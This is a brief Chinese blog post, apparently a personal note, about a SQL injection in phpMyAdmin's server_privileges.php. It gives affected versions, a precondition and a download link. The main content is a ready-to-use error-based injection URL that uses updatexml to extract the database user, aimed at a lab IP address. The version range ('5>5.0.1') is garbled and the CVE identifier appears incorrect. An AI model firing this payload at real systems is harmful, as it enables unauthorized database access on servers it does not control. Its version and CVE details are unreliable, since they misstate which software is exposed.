PhpMyadminSQL注入(CVE-2020-0554)
2020-01-24 本文已影响0人
这是什么娃哈哈
影响版本: 4<4.9.4 and 5>5.0.1
前提:已知phpMyadmin的一个用户口令
5.0下载地址:https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdmin-5.0.0-english.zip
PAYLOAD:
http://192.168.59.146/phpMyAdmin-5.0.0/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20
